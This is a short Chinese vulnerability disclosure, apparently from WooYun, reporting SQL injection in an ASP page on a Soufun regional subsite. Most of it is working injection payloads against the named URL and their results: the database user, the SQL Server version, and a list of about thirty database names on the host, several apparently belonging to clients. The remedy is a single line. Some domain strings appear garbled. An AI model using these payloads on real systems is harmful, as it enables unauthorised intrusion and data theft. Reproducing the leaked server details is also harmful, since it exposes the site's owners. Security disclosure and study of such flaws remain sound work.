http://gz.soufun测试数据/popsite/meilin/shownewsen.asp?id=140 未对参数进行过滤导致数据和服务器信息泄漏等问题 应该还能进一步下去 漏洞 证明:http://gz.soufun测试数据/popsite/meilin/shownewsen. asp ?id=140 and db_name()>0 -> db:meilinjiye and user>0 -> user:meilin and 1=convert(int,@@version)-- ->version:Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) and 0 <> db_name(n) 0-> 'meilinjiye' 1-> 'master' 2-> 'tempdb' 3-> 'model' 4-> 'msdb' 5-> 'pubs' 6-> 'Northwind' 7-> 'njtlg' 8-> 'meilinjiye' 9-> 'chengkai' 10-> 'futongdb' 11-> 'shresource' 12-> 'sfb_xk' 13-> 'rjcpddb' 14-> 'szhouse' 15-> 'lingpeng' 16-> 'njyb' 17-> 'hongda' 18-> 'songdu' 19-> 'myhwk' 20-> 'cshouse' 24-> 'HdhCmsTestjufeng测试数据' 26-> 'vanke' 27-> 'HdhCmsTestzjnahc测试数据' 28-> 'HdhCmsTestqcfc.net' 29-> 'HdhCmsTesteaseskyplaza测试数据' 30-> 'HuaRunXHJ' 33-> 'HdhCmsTestzjszfc测试数据.cn' 40-> 'HdhCmsTestdyxfc测试数据' 45-> 'HdhCmsTestabbewa测试数据' 46-> 'HdhCmsTestgzpma测试数据' 47-> 'HdhCmsTestshangshuiyuan测试数据' 49-> 'WuHan_Hits' ... 修复方案: 过滤参数 作者Ambulong@乌云
查看更多关于搜房网分站SQL注射漏洞导致多个数据库数据泄漏的详细内容...